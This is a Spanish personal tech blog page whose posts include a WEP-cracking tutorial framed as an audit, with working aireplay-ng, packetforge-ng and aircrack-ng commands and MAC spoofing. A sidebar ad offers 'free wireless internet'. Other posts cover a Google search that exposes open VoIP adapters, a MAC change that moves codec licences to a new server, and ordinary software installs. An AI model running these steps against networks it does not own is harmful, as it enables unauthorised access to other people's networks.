Hagamos que México crezca..

Prefiere el consumo de lo Hecho en México

Prefiere el consumo de lo Hecho en México
BúsquedaHagamos que México crezca..
![]() Prefiere el consumo de lo Hecho en México Posts Recientes
Adaptador USB para Auditoría de Redes Inalámbricas e Internet Inalámbrico Gratis
![]() Llévalo dónde quieras y conéctate a cualquier red inalámbrica.. En tan solo $349.00 pesos Conversación |
Auditoría de Red Inalámbrica para verificar Ataque por Fragmentación con Aireplay, Airodump y AircrackLa Auditoría inalámbrica siempre es necesaria para auditar la seguridad y eficiencia de una red inalámbrica, ya que permite descubrir las vulnerabilidades que puede tener una red inalámbrica lo que puede perjudicar en las conexiones con los clientes inalámbricos e incluso de tener intrusos dentro de la organización, que en el mejor de los casos solo pueda estar ocupando ancho de banda, pero en otros puede incluso llegar a snifear todo el tráfico de red.
Uno de los principales ataques y más eficaces en las redes inalámbricas es el ataque por fragmentación, en este caso muestro un tutorial rápidamente de como se puede llevar a cabo esta auditoría para verificar si tú red es vulnerable a tal ataque, este tutorial se puede llevar a cabo con un adaptador USB con chip RTL8187L sobre Ubuntu Linux o con algún LiveCD tal como Wifislax o WifiWay.
rm -rf llave* iwconfig wlan0 rate 1M mode monitor macchanger -m 00:A0:F8:01:02:03 wlan0 airodump-ng wlan0 #Teclear Ctrl +C despues de obtener el listado de redes disponibles #Me devuelve info de las redes inalámbricas cercanas ** BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:21:7C:CA:B7:F9 8 26 1 0 6 54. WEP WEP OPN PhylevnWireless MAC del AP: 00:21:7C:CA:B7:F9 Canal: 6 ESSID: PhylevnWireless ENC: WEP CIF: WEP ** iwconfig wlan0 channel 6 airodump-ng --bssid 00:21:7C:CA:B7:F9 -w llave -c 6 wlan0 #Abrir una consola (Consola <img src="plugins/Emoticons/images/face-glasses.png" border="0" alt="face-glasses.png " width="16" height="16" /> aireplay-ng -1 6 -e PhylevnWireless -a 00:21:7C:CA:B7:F9 -h 00:A0:F8:01:02:03 wlan0 #Abrir una consola (Consola C) aireplay-ng -5 -b 00:21:7C:CA:B7:F9 -h 00:A0:F8:01:02:03 wlan0 #Cuándo diga Use this packet ? teclear "y" sin las comillas #Use this packet ? y #Al final de ejecutar este comando me mandará algo como esto: Saving keystream in fragment-0701-205127.xor #ese archivo lo usaremos para generar un paquete bomba packetforge-ng -0 -a 00:21:7C:CA:B7:F9 -h 00:A0:f8:01:02:03 -k 192.168.1.100 -l 192.168.1.176 -y fragment-0701-205127.xor -w bomba #-k usar la misma IP de ejemplo #-l usar la misma IP de ejemplo -y es el archivo fragment-0701-205127.xor que se generó anteriormente con el comando "aireplay-ng -5 -b 00:21:7C:CA:B7:F9 -h 00:A0:F8:01:02:03 wlan0" -w es el paquete bomba generado #inyección de paquetes con el paquete bomba sudo aireplay-ng -2 -b 00:21:7C:CA:B7:F9 -h 00:A0:F8:01:02:03 -r bomba wlan0 #cuándo pregunte Use this packet ? teclear "y", sin comillas #Use this packet ? y #y Ahí debería a empezar hacer el ataque.. #Abri una consola (Consola D) #de ahi en otra ventana ejecutar cada que vaya avanzando el 5000 el valor de #data en la primer consola A hasta obtener la llave wep, cp llave-01.cap llave.cap aircrack-ng -z llave.cap Instalando Postgresql con soporte de UUID para usar con OpenBravoHace unos días intenté instalar desde cero OpenBravo, el cuál es un ERP que tiene críticas muy buenas y lo interesante es que es Open Source por lo que el código está disponible para su descarga, modificación e implementación, por lo que lo descargué para poder darle una revisión.
La instalación de OpenBravo la quise hacer de la mano con Postgresql, primero intenté usar una versión binaria de postgres, pero al momento de instalar OpenBravo me regresaba un error el cuál era por que postgres no soportaba el tipo de datos UUID. UUID es un tipo de datos que genera identificadores únicos serializados, hay una polémica alrededor de este tipo de datos, ya que rompe con todo el esquema entidad-relación del modelado de base de datos, pero bueno en este caso era un requerimiento de OpenBRavo y habría que cumplirlo para poder probar el ERP. Bajé el código de Postgres e intenté compilarlo con la opción de --with-ossp-uuid, pero me arrojaba el siguiente error configure: error: library 'ossp-uuid' or 'uuid' is required for OSSP-UUID De hecho instalé la versión de la librería uuid 1.6.2 pero seguía dándome problemas, el detalle es que había que indicarle a postgres en dónde se localizaba las librerías de uuid para poder compilar con esa opción, por lo que rápidamente pongo aquí un tutorial de como realizarlo esperando alguien le ayude por si tuviera un problema similar en lo futuro:
cd ~/software wget http://ftp9.us.postgresql.org/pub/mirrors/postgresql/source/v8.3.7/postgresql-8.3.7.tar.gz wget ftp://ftp.ossp.org/pkg/lib/uuid/uuid-1.6.2.tar.gz cd /usr/src sudo tar -xzvf ~/software/uuid-1.6.2.tar.gz cd /usr/src/uuid-1.6.2 sudo./configure sudo make && sudo make check && sudo make install cd /usr/src sudo tar -xzvf ~/software/postgresql-8.3.7.tar.gz cd /usr/src/postgresql-8.3.7 su export LDFLAGS=-L/usr/local/lib ./configure --with-ossp-uuid -without-readline make all make install sudo useradd postgres sudo passwd postgres sudo mkdir -p /usr/local/pgsql/data sudo chown postgres /usr/local/pgsql/data sudo chmod -R 0700 /usr/local/pgsql/data sudo chown -R postgres /opt/PostgreSQL/8.3/ su - postgres /usr/local/pgsql/bin/initdb -D /usr/local/pgsql/data /usr/local/pgsql/bin/postgres -D /usr/local/pgsql/data >logfile 2>&1 & /usr/local/pgsql/bin/createdb test /usr/local/pgsql/bin/psql test ¿Qué es el BlueTooth Marketing?Por ahora es una moda electrónica, que consiste en enviar publicidad electrónica a través de dispositivos bluetooth de forma automática e instantánea.
Con esta tecnología es posible enviar a cualquier móvil cercano al sistema Bluetooth Marketing la publicidad multimedia previamente seleccionada. En la actualidad ya en el mercado existen diversos dispositivos y software para montar publicidad electrónica por bluetooth, solo basta buscar en Mercado Libre Bluetooth Marketing para encontrar diversas soluciones. Instalando la máquina de SUN VirtualBox en LinuxSUN liberó hace tiempo su máquina virtual VirtualBox la cuál corre en diversas plataformas y a mi gusto es una excelente máquina virtual para hacer pruebas y cosas por el estilo.
Puede ser útil por ejemplo para evaluar rápidamente LiveCDs y distros, así como para montar un WindowsXP sobre Linux para montar algún desarrollo de pruebas, entre otras utilidades. VirtualBox funciona sobre Linux, Windows, Intel Mac, FreeBSD y procesadores de 32 y 64 bits. En Windows es fácil de instalar, pero mucho más fácil lo es en Linux, pues solo basta hacer algo como lo siguiente:
cd ~/software wget http://download.virtualbox.org/virtualbox/2.2.4/VirtualBox-2.2.4-47978-Linux_x86.run sudo chmod +x VirtualBox-2.2.4-47978-Linux_x86.run sudo VirtualBox-2.2.4-47978-Linux_x86.run VirtualBox Para correr un LiveCD no hace falta tener un disco virtual dentro de VirtualBox y se puede correr desde un ISO o desde un CD, algo que me gustó de VirtualBox es que es muy fácil usar adaptadores USB con la máquina virtual, de tal forma que podemos usar adaptadores inalámbricos entre otros dispositivos USB con la máquina virtual. Los Viajes de Gulliver y el supuesto primer Hoax de la historiaHace unos días terminé de leer el libro Los Viajes de Gulliver de Jonathan Swift un Escritor Ingles, pensé que este libro se trataría de aventuras y cosas del deleite de la imaginación, pero conforme te vas adentrando en el libro te das cuenta que se trata de un libro que trata de reflejar lo peor de la condición humana y de una forma que el autor trata de querer influir en la gente de su época, por lo rara de la lectura me puse a buscar algo más sobre Jonathan Swift y encontré que fue el primero en lanzar un Hoax por correo tradicional algo parecido a los hoax actuales que se envían por correo electrónico -la palabra "Hoax" en ingles significa falsa alarma-.
El Hoax que lanzó el fué el siguiente, copiado de Wikipedia : En la edición de 1708 de su almanaque, John Partridge, muy conocido astrólogo de su época se refirió sarcásticamente a la Iglesia de Inglaterra como "La Iglesia infalible" lo que atrajo la atención del clérigo Jonathan Swift. Jonathan Swift creó un personaje falso, Isaac Bickerstaff, y publicó bajo ese seudónimo su famoso: “Predictions for the Year 1708″: “…yo pronostico solemnemente que ese vulgar escritor de almanaques llamado Partridge, cuyas predicciones son siempre vagas, imprecisas y erróneas, morirá exactamente el 29 de Marzo, por lo que le recomiendo que ponga sus asuntos en orden” Partridge respondió con una carta asegurando que ese Isaac Bickerstaff no era más que un astrólogo de poca monta deseoso de fama. El día 30, Swift publicó otra carta anónima, en el que el supuesto autor relata que Partridge había enfermado cuatro días antes y que había fallecido en su residencia a las 7:05pm del día 29 de Marzo. La carta fue publicada por otros escritores y periódicos que creyeron la carta. John Partridge se apresuró a desmentir por carta la mentira. Pero fue inútil: El nombre de John Partridge fue retirado del registro oficial, con lo que oficialmente se le consideraba como muerto, y todo el mundo creyó que realmente había muerto, incluyendo a muchos fans que se agruparon a la puerta de su casa para una vigilia, y hasta enterradores que se acercaron para hacerse cargo de las pompas fúnebres del famoso astrólogo. A partir de ese momento la carrera de John Partridge cayó en picado, y tuvo que dejar de publicar su almanaque por caída de ventas. Sus detractores, muchos debido a su poca popularidad entre seguidores de la Iglesia, aquellos cuya muerte había predicho, anti-whigs y aquellos que pensaban que la astrología era todo mentira, continuaron con el Hoax mucho después por venganza. Swift usó el seudónimo de Bickerstaff por última vez en 1709 con “Una reivindicación de Isaac Bickerstaff”. En ella daba supuestas pruebas para demostrar que Partridge realmente había muerto. Entre ellas, que era “…imposible que ningún hombre vivo pudiera haber escrito tanta bazofia“.' Aunque otro Hoax muy importante es sobre La Donación de Constantino, Constantino fué el primer emperador Romano católico, la cuál puede ser la falsificación más famosa de la historia por parte de la iglesia católica. http://www.herenciacristiana.com/museo/constantinotxt.html Todo esto a colación de la cantidad de correos Hoax que se envía diariamente, como que el 27 de Agosto habrá 2 lunas y demás leyendas urbanas. Configurando el tipo de Ring para diversas llamadas entrantes en Teléfonos VoIP y Adaptadores Telefonicos(PAP2)Hace unos días me contactó un amigo preguntándome de como podía cambiar el tipo de ring de un teléfono, ya que siempre sonaba igual si llamaban del portero(frente de calle), de una línea de su E1 o de otra extensión IP, entonces a veces cuándo alguien llamaba de la PSTN le contestaba como si fuera su compañero, cuándo venía del portero o de una extensión interna decía bueno, era un relajo para acabar pronto.
La solución fué fácil, ya que en su caso está usando ATAs PAP2 los cuáles tienen 2 puertos FXS para convertir teléfonos analógicos en teléfonos IP, de tal forma que en la configuración del ATA se le puede indicar en la opción de "Distinctive Ring Patterns" diferentes Rings para los Callerd ID entrantes, de tal forma que se asignó el Ring 1 a todas las extensiones que sean del 100 al 199, el Ring 2 al portero que en este caso es 301 y el Ring 3 a todas las llamadas de la red PSTN(Telefonía Pública) que tienen un caller id de 8 dígitos. Lo curioso de todo esto es que buscando información sobre Distinctive Ring Settings en google, me encontró PAP2 que están conectados directamente a internet y su configuración está abierta.. :S http://www.google.com/search?hl=es&q=%22Distinctive+Ring+Settings%22+PAP2&btnG=Buscar&lr= ¿ Tu también acostumbras dejar en la red pública tus dispositivos sin protección ? Cambiando la MAC Address de una interfaz en ubuntuHace unos días instalé unas licencias del códec g729 en un servidor de VoIP, pero por una razón tuve que cambiar de servidor, el detalle fué que las licencias g729 al registrarlas digium casa la licencia con la mac address de la interfaz de red, y para que Digium permita registrar la licencia de los códecs hay que contactarlos y mandar un documento, etc., pero por practicidad lo que primero se me ocurrio es que antes de iniciar el script de inicio de asterisk, cambiar la mac address mediante el comando macchanger:
macchanger -m 00:01:02:03:04:05 eth0 Y luego continuar con el inicio normal de Asterisk y demás servicios, las licencias funcionaron y fueron reconocidos los canales g729 que se compraron. Pero esta forma de cambiar la mac no se me hizo tan elegante, por lo que cambié el procedimiento y solo configuré la MAC address del equipo en el archivo /etc/network/interfaces de la siguiente manera:
auto eth0 iface eth0 inet static address 192.168.10.253 netmask 255.255.255.0 network 192.168.10.0 broadcast 192.168.10.255 gateway 192.168.10.1 dns-nameservers 208.67.220.220 hwaddress ether 00:01:02:03:04:05 /etc/init.d/networking restart Y con esto al iniciar el servidor automáticamente cambiará la mac address del equipo y las licencias g729 serán reconocidas por Asterisk Instalación de Domus.Link en Linux para controlar dispositivos X10 desde una página web.Domus.Link es un software que permite controlar dispositivos X10 desde una página web.
Antes de seguir la siguiente bitácora se requiere tener instalado heyu y para ello se puede acceder al siguiente post AQUI.
mkdir -p ~/software/opensource cd ~/software/opensource wget http://domus.link.co.pt/src/domuslink-1.0.1.tar.gz cd /var/www sudo tar -xzvf ~/software/opensource/domuslink-1.0.1.tar.gz cd domus.Link #verificar que heyu no esté corriendo, ps aux | grep heyu heyu stop #respaldamos la configuración actual de heyu sudo cp /etc/heyu/x10.conf /etc/heyu/x10.conf.backup sudo cp /etc/heyu/x10.sched /etc/heyu/x10.sched.backup #copiamos la configuración de domus.link en heyu sudo cp /var/www/domus.Link/doc/x10.conf /etc/heyu/x10.conf sudo cp /var/www/domus.Link/doc/x10.sched /etc/heyu/x10.sched #editamos la nueva configuración de heyu y configuramos el puerto serial usado sudo editor /etc/heyu/x10.conf #en mi caso como uso un adaptador de serial a usb TTY /dev/ttyUSB0, por defecto es /dev/ttyS0 #Cambiamos los permisos del archivo de configuración para que puedan ser accedidos por el usuario del servidor web sudo chown www-data.www-data /etc/heyu/x10.conf sudo chown -R www-data.www-data /var/www/domus.Link sudo chmod o+rw /etc/heyu/x10.conf /var/www/domus.Link/db/floorplan /var/www/domus.Link/config.php #cambiamos permisos al puerto serial para que pueda ser accedido por el servidor web sudo chmod o+rw /dev/ttyUSB0 #creamos un enlace dinámico a heyu para que pueda ser encontrado por domus.Link, para ver donde esta instalado heyu teclear whereis heyu #despues de encontrado heyu creamos el enlace sudo ln -s /usr/local/bin/heyu /usr/bin/heyu #ahora ya teniendo prácticamente todo configurado, entramos a la página web de dónde se instalo la aplicación de domus.Link http://localhost/domus.Link #password por default 1234 #iniciamos el servicio, si hay un error verificar los pasos anteriores. #Ya que haya iniciado el servicio entraremos al ícono de configurció ubicado en la parte derecha. #ahí podremos crear habitaciones para poder asignar los dispositivos. #los alias es una forma fácil de poder identificar el ID del dispositivo #para crear un alias relacionaríamos el ID del dispositivo X10 con un nombre, #también seleccionaremos que tipo de módulo es, si es un socket puede ser LM14A o LM15A, si es un appliance stdAM. #necesitaríamos indicar si es un dispositivo de luz, appliance o de irrigación. # y por último elegimos dónde está el dispostivo en una sala, cocina, cochera, etc., dependiendo de los espacios configurados. # Despues de que ya se tenga configurado el esquema ahora si desde la página web ya se pueden manipular los dispositivos X10. VoicePHP la promesa de aplicaciones con reconocimiento y sintesis de vozLlevo unas semanas trabajando sobre reconocimiento de voz en linux, el detalle es que actualmente no existen alternativas Open Source serias para el reconocimiento de voz, tenemos sphinx pero le falta mucho para llegar a ser una opción para desarrollos de aplicaciones de voz.
Existen un par de opciones propietarias por ahí bastante buenas las cuales tienen integración hasta con Asterisk para desarrollo de aplicaciones de telefonía IP con reconocimiento de voz, incluso soportan español mexicano y tienen una alta calidad en el reconocimiento de voz, pero como todo lo bueno cuesta, no son nada baratas estas opciones, pero bien valen la pena pagar esos pavos y a una empresa a corto plazo es redituable implementar este tipo de soluciones. Hace unos días adquirí unas licencias de pruebas de 2 opciones propietarias de reconocimiento de voz y realmente me sorprendió la calidad del reconocimiento de voz, lo interesante es que no solo puedes usarlo para aplicaciones de telefonía IP si no lo puedes integrar con diversas tecnologías, por ejemplo hace apenas unos días me llegó de EU unos equipos con tecnología x10 los cuáles te permiten integrar tecnologías de domótica a bajo costo, de tal forma que integrando estas tecnologías de voz con x10, mediante voz puedes prender luces de tu casa, activar y desactivar alarmas, prender dispositivos electrónicos, sistemas de irrigación, abrir puertas, cerrar cortinas, etc.. Todo esto sería excelente si pudiera ser completamente Open Source, que casi lo es a excepción del reconocimiento de voz, pero al parecer ya hay una luz al final del tunel, pues está ya en desarrollo y de hecho ya hay un beta de VoicePHP, que promete ser un sintetizador de voz al igual que soportará reconocimiento de voz, permitiendo usar PHP como plataforma de desarrollo. Los creadores de VoicePHP aun no saben si lo liberarán como OpenSource, pero hay esperanzas, aún no he probado ese beta pero ya les mandé un correo para que me lo envíen y ver que pinta tiene y ver como sacarle jugo a la tecnología de VoicePHP. Si les interesa dense una vuelta a su página para saber más de VoicePHP http://www.voicephp.com ¿ Y tú ya has hecho algún desarrollo sobre reconocimiento de voz o algo por el estilo ? Carlos Kazuga y la Filosofía Japonesa aplicada a MéxicoHace unos días prendí la tv y en canal 40 estaba pasando una entrevista que hizo el publicista Carlos Alazraki a Carlos Kasuga quién es el presidente de Yakult. En esta entrevista el empresario japones hace una excelente comparación entre la línea de la vida de un ser humano y las estaciones del año, curiosamente una madrugada prendí la radio y estaba una repetición de una entrevista de Carlos Kasuga con una locutora de radio y hablaba igual de esa comparación, y nuevamente me puse a escuchar la entrevista ya que la verdad es muy interesante.
Hace un rato entré a youtube a buscar algo más de Carlos Kasuga y encontré una entrevista que Alazraki le realizó previamente a la que ví, entonces viendo la primera que hizo a Carlos Kazuga me resultó muy interesante pues narra muchos aspectos de como México podría ser más exitoso cambiando cosas básicas que permitiría que los mexicanos seamos mejores como personas, como empresarios y en otros aspectos. Por lo que sin más pongo aquí la liga a esa entrevista que la verdad vale la pena chutársela toda. http://www.youtube.com/watch?v=htPjcCEMhEY Estadísticas de visitantes96426 |
Categorías
Eventos
CoNSoL 2009
Congreso Nacional de Software Libre 2009 ![]() http://www.consol.org.mx 14 al 17 de Abril de 2009 Programa de Conferencias Encuesta |
Comentarios Recientes